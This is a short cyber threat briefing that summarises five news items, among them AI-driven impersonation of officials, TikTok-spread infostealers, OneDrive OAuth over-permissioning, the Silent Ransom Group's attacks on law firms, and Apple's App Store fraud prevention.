Threat Briefing: May 30, 2025

Cyber threat actors are constantly evolving their tactics and increasingly turning to artificial intelligence (AI) to enhance their operations. AI enables them to generate convincing videos and images to impersonate individuals, create enticing content to promote fake technologies, and craft deceptive messages that trick users into downloading malware or revealing login credentials. While AI can be exploited for malicious purposes, it also holds significant potential for good—helping organizations work more efficiently and uncover valuable insights from data.

• FBI Warns of AI-Driven Impersonation Campaign Targeting Government Officials – The FBI has issued a public service announcement about an ongoing malicious campaign in which unidentified threat actors are using artificial intelligence to impersonate senior U.S. government officials. These attacks involve smishing (text) and vishing (voice) tactics, using spoofed phone numbers and AI-generated voices to build trust and deceive victims into clicking malicious links or disclosing sensitive information. While the primary targets have been current and former government officials, the FBI warns that these tactics could be used against anyone. The public is urged to verify the identity of unexpected messages or calls and to avoid interacting with suspicious links. IC3.gov
• TikTok Videos Spread Vidar and Stealc Malware Through Fake Activation Instructions – Cybercriminals are using TikTok videos, some potentially AI-generated, to distribute Vidar and Stealc information-stealing malware. The videos deceive viewers into running PowerShell commands disguised as activation steps for pirated or premium software. Once executed, the malware harvests credentials, browser data, and other sensitive information. Leveraging TikTok’s powerful algorithm, some of these malicious videos have reached over 500,000 views, underscoring the growing threat of social media-driven malware campaigns, particularly when amplified by AI-generated content. Trend Micro
• Researchers Warn of Excessive OneDrive Access Granted to Third-Party Apps – Hundreds of third-party applications, such as Slack, Trello, and ChatGPT, may have full access to users’ entire Microsoft OneDrive storage due to overly broad OAuth permissions in the OneDrive file picker. Users who believe they’re sharing a single file may unknowingly expose their entire cloud storage. The risk is amplified by vague consent prompts and insecure token storage, which could lead to data theft, alteration, or encryption. Researchers have disclosed the issue to Microsoft, and organizations are urged to audit app permissions and avoid storing sensitive data in OneDrive without strong access controls. Dark Reading
• FBI Warns Law Firms Targeted by Silent Ransom Group – The FBI has issued an alert about the Silent Ransom Group (SRG), also known as Luna Moth or UNC3753, which is targeting U.S. law firms in a growing ransomware campaign. The group has also attacked organizations in the medical and insurance sectors. SRG uses phishing emails about fake “subscription fees,” prompting recipients to call a provided number to cancel. Victims are then sent a malicious link that installs remote access software. In some cases, SRG poses as IT support to convince employees to grant access. Once inside, the group quickly exfiltrates sensitive data using tools like WinSCP or Rclone and demands ransom payments under the threat of public data exposure. IC3.gov
• Apple Blocks Over $9 Billion in Fraudulent App Store Transactions Over Five Years – Apple has prevented more than $9 billion in potentially fraudulent transactions on the App Store over the past five years, underscoring its commitment to user and developer safety. The company identified and blocked approximately 4.7 million stolen credit cards and stopped over $2 billion in fraudulent charges in 2023 alone. In addition, Apple banned more than 1.6 million accounts, removed over 146,000 developer accounts for fraud or abuse, and rejected over 139,000 developer enrollments. These efforts are part of Apple’s broader strategy to maintain a secure, trusted app ecosystem through a combination of advanced technology and human oversight. Apple Newsroom